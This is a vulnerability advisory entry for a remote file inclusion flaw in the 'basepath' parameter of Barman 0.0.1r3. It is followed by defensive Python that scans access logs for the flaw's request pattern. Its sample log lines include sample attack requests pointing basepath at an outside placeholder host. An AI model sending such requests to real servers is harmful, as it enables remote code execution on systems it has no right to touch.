Vendor: Barman
By: DeltahackingTEAM
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: 98
Product Name: Barman
Affected Version From: 0.0.1r3
Affected Version To: 0.0.1r3
Patch Exists: Yes
Related CWE: N/A
CPE: a:barman:barman:0.0.1r3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Barman 0.0.1r3 Remote File Inclusion
A remote file inclusion vulnerability exists in Barman 0.0.1r3. The 'interface.php' script does not properly sanitize user-supplied input in the 'basepath' parameter. An attacker can exploit this by sending a malicious URL to a legitimate user of the application; the URL contains a specially crafted 'basepath' parameter with a malicious file path. Successful exploitation allows the attacker to execute arbitrary code on the vulnerable system.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
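
For hosts that cannot be upgraded immediately, web access logs can be reviewed for the request shape described above. The following Python code is an added example, not part of the original advisory or of Barman's code: it flags requests to 'interface.php' whose 'basepath' value names a remote resource instead of a local path. The log lines are constructed samples in Common Log Format, and the function names, hosts and addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that names a remote resource: a URL scheme of two or more characters
# (so a Windows drive letter such as C: is not flagged), //host, or a UNC \\host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)


def suspicious_basepath(log_line):
    """Return the decoded 'basepath' value if the request targets interface.php
    and the value points at a remote resource; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/interface.php"):
        return None
    # parse_qsl percent-decodes once, the same view the application gets.
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key == "basepath" and REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            if (hit := suspicious_basepath(line)) is not None]


# Constructed sample log lines (documentation-range addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2006:10:00:00 +0000] '
    '"GET /barman/interface.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2006:10:00:05 +0000] '
    '"GET /barman/interface.php?basepath=http://host.example/inc HTTP/1.1" 200 90',
    '203.0.113.9 - - [01/Jan/2006:10:00:09 +0000] '
    '"GET /barman/interface.php?basepath=http%3A%2F%2Fhost.example%2Finc HTTP/1.1" 200 90',
    '203.0.113.7 - - [01/Jan/2006:10:00:12 +0000] '
    '"GET /barman/interface.php?basepath=lib/ HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote basepath {value!r}")
```

A hit only shows that a request of this shape reached the server; whether the include succeeded has to be confirmed from the application host itself.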